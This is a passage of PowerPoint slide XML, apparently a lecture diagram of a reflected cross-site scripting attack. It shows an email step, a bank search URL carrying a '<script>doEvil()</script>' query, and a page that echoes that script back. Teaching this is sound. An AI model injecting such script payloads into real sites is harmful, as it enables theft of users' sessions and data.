          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781832" y="3441515"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="698" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114642" y="67271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133350"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2222122" y="3952351"/>
              <a:ext cx="4625340" cy="14604"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4625340" h="14604">
                  <a:moveTo>
                    <a:pt x="4625136" y="14160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38099">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2222113" y="3886037"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114935" h="133350">
                  <a:moveTo>
                    <a:pt x="114096" y="133349"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2703195" y="3953916"/>
              <a:ext cx="3733800" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3733800" h="369570">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3733800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3733800" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3931018" y="2289212"/>
            <a:ext cx="1678940" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2949176" y="1440405"/>
            <a:ext cx="981421" cy="1078479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631616" y="5233605"/>
            <a:ext cx="390313" cy="242866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4388545"/>
            <a:ext cx="2479885" cy="1144692"/>
            <a:chOff x="275348" y="3291408"/>
            <a:chExt cx="1859914" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3301834"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929982" y="329617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9" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3418331"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>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31" name="object 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>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32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2118051" y="4668628"/>
            <a:ext cx="677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6933"/>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3" name="object 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1217168" y="4630908"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="912875" y="3473180"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1653540" y="3473180"/>
              <a:ext cx="460235" cy="150866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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6" name="object 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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7" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1860794" y="3604245"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="912875" y="3700251"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="954683" y="3734722"/>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40" name="object 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2087281" y="4752070"/>
            <a:ext cx="97367"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6933"/>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41" name="object 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1360745" y="4695415"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="1020558" y="3521561"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="object 42"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1655064" y="3535667"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>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4" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>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5" name="object 45"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1020558" y="3521561"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="object 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641753" y="5158094"/>
            <a:ext cx="1148080"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7" name="object 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1204976" y="4941817"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="903732" y="3706362"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 48"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="903732" y="3706362"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 49"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="object 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>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51" name="object 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="960221" y="3762463"/>
              <a:ext cx="233679" cy="154305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="233680" h="154304">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52" name="object 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259096" y="5060638"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2627936"/>
            <a:ext cx="4843780" cy="672832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="44025" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923">
              <a:spcBef>
                <a:spcPts val="345"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13"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safebank.com/search.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="object 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542644" y="407731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sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2202247"/>
            <a:ext cx="1351280" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1013459" h="172719">
                <a:moveTo>
                  <a:pt x="1013459" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1013459" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1013459" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="object 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523067" y="2150769"/>
            <a:ext cx="7498080" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="6773" algn="r">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="object 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778241" y="2446087"/>
            <a:ext cx="3192780" cy="477520"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2394584" h="358139">
                <a:moveTo>
                  <a:pt x="1658112" y="185928"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="185928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="358140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1658112" y="358140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1658112" y="185928"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2394584" h="358139">
                <a:moveTo>
                  <a:pt x="2394204" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1287780" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736092" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736092" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287780" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2394204" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2394204" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="object 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8761308" y="2394608"/>
            <a:ext cx="3209713" cy="515141"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="113450">
              <a:lnSpc>
                <a:spcPct val="101699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>returned </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>results</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="object 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610610" y="5295596"/>
            <a:ext cx="4965700" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="115144">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
